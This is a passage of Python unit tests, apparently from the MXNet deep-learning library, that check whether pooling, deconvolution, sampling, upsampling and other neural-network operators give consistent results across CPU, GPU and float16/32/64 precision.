check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(3,3), pool_type='max', pooling_convention='full', name='pool')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(kernel=(300,300), pool_type='max', global_pool=True, name='pool')
check_consistency(sym, ctx_list)
@with_seed()
def test_deconvolution_with_type():
# Test basic deconvolution without exercising stride, pad or dilation.
# 1D deconvolution
sym = mx.sym.Deconvolution(num_filter=3, kernel=(3,), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
# 2D deconvolution
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), name='deconv')
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# wider tolerance needed for true-fp16 test above
tol = {np.dtype(np.float16): 0.3,
np.dtype(np.float32): 1e-3,
np.dtype(np.float64): 1e-5,
np.dtype(np.uint8): 0,
np.dtype(np.int32): 0}
check_consistency(sym, ctx_list, tol=tol)
check_consistency(sym, ctx_list, tol=tol, grad_req="add")
@with_seed()
def test_deconvolution_options():
# 1D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 7), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), pad=(1,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), pad=(1,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), stride=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), stride=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(layout='NCW', num_filter=3, kernel=(3,), dilate=(2,), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=3, kernel=(3,), dilate=(2,), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# 2D deconvolution
ctx_list = [{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}},
{'ctx': mx.gpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float16}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float64}},
{'ctx': mx.cpu(0), 'deconv_data': (2, 2, 10, 10), 'type_dict': {'deconv_data': np.float32}}]
# Pad > 0
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), pad=(1,1), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Stride > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), stride=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# Dilate > 1
sym = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), name='deconv')
sym_no_cudnn = mx.sym.Deconvolution(num_filter=2, kernel=(3,3), dilate=(2,2), cudnn_off=True, name='deconv')
check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # 3D deconvolution (not yet enabled)
# ctx_list = [{'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.cpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float64}},
# {'ctx': mx.gpu(0), 'conv_data': (2, 2, 5, 7, 7), 'type_dict': {'conv_data': np.float32}}]
# # Pad > 0
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), pad=(1,1,1), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
# # Stride > 1
# sym = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), name='conv')
# sym_no_cudnn = mx.sym.Convolution(num_filter=3, kernel=(2,3,3), stride=(2,2,2), cudnn_off=True, name='conv')
# check_consistency_NxM([sym, sym_no_cudnn], ctx_list)
@with_seed(1234)
def test_bilinear_sampler_with_type():
data = mx.sym.Variable('data')
grid = mx.sym.Variable('grid')
sym = mx.sym.BilinearSampler(data=data, grid=grid)
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}},
{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float16}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float64}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'grid': (1, 2, 10, 10),
'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@with_seed()
def test_grid_generator_with_type():
data = mx.sym.Variable('data')
sym = mx.sym.GridGenerator(data=data, transform_type='affine', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 6), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
sym = mx.sym.GridGenerator(data=data, transform_type='warp', target_shape=(20, 20))
ctx_list = [{'ctx': mx.gpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (3, 2, 20, 20), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/7645")
@with_seed(1234)
def test_spatial_transformer_with_type():
data = mx.sym.Variable('data')
loc = mx.sym.Flatten(data)
loc = mx.sym.FullyConnected(data=loc, num_hidden=10)
loc = mx.sym.Activation(data=loc, act_type='relu')
loc = mx.sym.FullyConnected(data=loc, num_hidden=6)
sym = mx.sym.SpatialTransformer(data=data, loc=loc, target_shape=(10, 10),
transform_type="affine", sampler_type="bilinear")
ctx_list = [{'ctx': mx.gpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}},
{'ctx': mx.cpu(0), 'data': (1, 5, 10, 10), 'type_dict': {'data': np.float32}}]
check_consistency(sym, ctx_list)
check_consistency(sym, ctx_list, grad_req="add")
# Checking max pooling consistency over data sets of different float types is problematic,
# as the element that is the maximum in a float32 data set may no longer be the unique
# maximum once the data is cast to float16 (see the illustrative sketch after this test).
# Note: this definition shadows the earlier test_pooling_with_type above, so only this
# version of the test is collected by the test runner.
@with_seed(1234)
def test_pooling_with_type():
ctx_list = [{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}},
{'ctx': mx.gpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float16}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float64}},
{'ctx': mx.cpu(0), 'pool_data': (10, 2, 10, 10), 'type_dict': {'pool_data': np.float32}}]
sym = mx.sym.Pooling(name='pool', kernel=(3,3), stride=(2,2), pool_type='max')
check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='avg')
check_consistency(sym, ctx_list)
# this is unstable
# sym = mx.sym.Pooling(name='pool', kernel=(5,5), pad=(2,2), pool_type='max')
# check_consistency(sym, ctx_list)
sym = mx.sym.Pooling(name='pool', kernel=(3,3), pad=(1,1), pool_type='sum')
check_consistency(sym, ctx_list)
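# Illustrative sketch (not part of the original test suite) of the fragility described in
# the comment above: two values that are distinct in float32 can round to the same float16
# value, so the location of the maximum (and therefore where the max-pooling gradient is
# routed) becomes ambiguous after the cast.
def _fp16_argmax_tie_sketch():
    a = np.array([1.0001, 1.0002], dtype=np.float32)  # np is already imported by this module
    assert np.argmax(a) == 1                           # distinct values in float32
    assert np.argmax(a.astype(np.float16)) == 0        # both round to 1.0 in float16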
@with_seed()
def test_pooling_versions():
def test_pooling_versions_helper(pool_op_list, data, kernel, pool_type, pad, stride,
pooling_convention='valid', global_pool=False):
ctx_list = []
sym_list = []
# PoolingV1 cpu
if 'pool_v1_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# PoolingV1 gpu
if 'pool_v1_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling cpu
if 'pool_cpu' in pool_op_list:
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, name='pool'))
# Pooling gpu
if 'pool_gpu' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=True, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=True,
name='pool'))
# CuDNNPooling
if 'pool_cudnn' in pool_op_list:
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
if not global_pool:
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, cudnn_off=False, name='pool'))
else:
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type, global_pool=True, cudnn_off=False,
name='pool'))
check_consistency(sym_list, ctx_list)
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0,)
stride = (1,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2,)
stride = (2,)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 5)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0)
stride = (1, 1)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
# pool_v1 has bugs when pad is not 0, do not test PoolingV1 here
pad = (2, 3)
stride = (2, 3)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_v1_cpu', 'pool_v1_gpu', 'pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
def test_3d_pooling(pool_type):
data = (2, 3, 20, 20, 20)
kernel = (4, 5, 3)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='valid', global_pool=False)
pad = (0, 0, 0)
stride = (1, 1, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
pad = (2, 3, 3)
stride = (2, 3, 1)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention='full', global_pool=False)
test_pooling_versions_helper(pool_op_list=['pool_cpu', 'pool_gpu', 'pool_cudnn'],
data=data, kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
global_pool=True)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
test_3d_pooling('max')
test_3d_pooling('avg')
test_3d_pooling('sum')
@with_seed()
def test_global_pooling():
def test_1d_pooling(pool_type):
data = (2, 3, 20)
kernel = (4,)
pad = (2,)
stride = (2,)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
def test_2d_pooling(pool_type):
data = (2, 3, 20, 20)
kernel = (4, 4)
pad = (2, 2)
stride = (2, 2)
ctx_list = []
sym_list = []
pooling_convention = 'valid'
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling_v1(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.cpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=False, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pad=pad, stride=stride, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(kernel=kernel, pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
ctx_list.append({'ctx': mx.gpu(0), 'pool_data': data, 'type_dict': {'pool_data': np.float32}})
sym_list.append(mx.sym.Pooling(pool_type=pool_type,
pooling_convention=pooling_convention, global_pool=True, cudnn_off=True, name='pool'))
check_consistency(sym_list, ctx_list)
test_1d_pooling('max')
test_1d_pooling('avg')
test_1d_pooling('sum')
test_2d_pooling('max')
test_2d_pooling('avg')
test_2d_pooling('sum')
@with_seed()
def test_upsampling_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='nearest', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}},
{'ctx': mx.gpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float16}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float64}},
{'ctx': mx.cpu(0), 'up_arg0': (2, 2, 2, 10), 'type_dict': {'up_arg0': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_upsampling_bilinear_with_type():
sym = mx.sym.UpSampling(scale=2, num_filter=2, name='up', sample_type='bilinear', num_args=1)
ctx_list = [{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}},
{'ctx': mx.gpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float16}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float64}},
{'ctx': mx.cpu(0), 'up_data': (2, 2, 2, 10), 'type_dict': {'up_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_concat_with_type():
sym = mx.sym.Concat(name='concat', num_args=2)
ctx_list = [{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}},
{'ctx': mx.gpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float16, 'concat_arg1': np.float16}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float64, 'concat_arg1': np.float64}},
{'ctx': mx.cpu(0), 'concat_arg1': (2, 10), 'concat_arg0': (2, 10),
'type_dict': {'concat_arg0': np.float32, 'concat_arg1': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_elementwisesum_with_type():
dev_types = [[mx.gpu(0), [np.float64, np.float32, np.float16]],
[mx.cpu(0), [np.float64, np.float32]] ]
for num_args in range(1, 6):
ews_arg_shape = {}
for i in range(num_args):
ews_arg_shape['ews_arg'+str(i)] = (2, 10)
sym = mx.sym.ElementWiseSum(name='ews', num_args=num_args)
ctx_list = []
for dev, types in dev_types:
for dtype in types:
ews_arg_dtype = {'type_dict':{}}
for i in range(num_args):
ews_arg_dtype['type_dict']['ews_arg'+str(i)] = dtype
ctx_elem = {'ctx': dev}
ctx_elem.update(ews_arg_shape)
ctx_elem.update(ews_arg_dtype)
ctx_list.append(ctx_elem)
check_consistency(sym, ctx_list)
@with_seed()
def test_reshape_with_type():
sym = mx.sym.Reshape(name='reshape', shape=(-1,1,1,0))
ctx_list = [{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}},
{'ctx': mx.gpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float16}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float64}},
{'ctx': mx.cpu(0), 'reshape_data': (2, 2, 2, 10), 'type_dict': {'reshape_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_blockgrad_with_type():
sym = mx.sym.BlockGrad(name='bg')
ctx_list = [{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}},
{'ctx': mx.gpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float16}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float64}},
{'ctx': mx.cpu(0), 'bg_data': (2, 2, 2, 10), 'type_dict': {'bg_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_swapaxis_with_type():
sym = mx.sym.SwapAxis(name='swap', dim1=1)
ctx_list = [{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}},
{'ctx': mx.gpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float16}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float64}},
{'ctx': mx.cpu(0), 'swap_data': (2, 2, 2, 10), 'type_dict': {'swap_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_fullyconnected_with_type():
sym = mx.sym.FullyConnected(num_hidden=3, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}},
{'ctx': mx.gpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float64}},
{'ctx': mx.cpu(0), 'inner_data': (2, 10), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
# Sizes are divisible by 8 to test TensorCore on Volta GPU.
sym = mx.sym.FullyConnected(num_hidden=8, name='inner')
ctx_list = [{'ctx': mx.gpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float16}},
{'ctx': mx.cpu(0), 'inner_data': (16, 24), 'type_dict': {'inner_data': np.float32}}]
check_consistency(sym, ctx_list)
@with_seed()
def test_activation_with_type():
act_types = ['relu', 'sigmoid', 'tanh', 'softrelu', 'softsign']
shape = (2, 2, 10, 10)
for act_type in act_types:
sym = mx.sym.Activation(name='act', act_type=act_type)
ctx_list = [{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float64}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float32}},
{'ctx': mx.gpu(0), 'act_data': shape, 'type_dict': {'act_data': np.float16}},
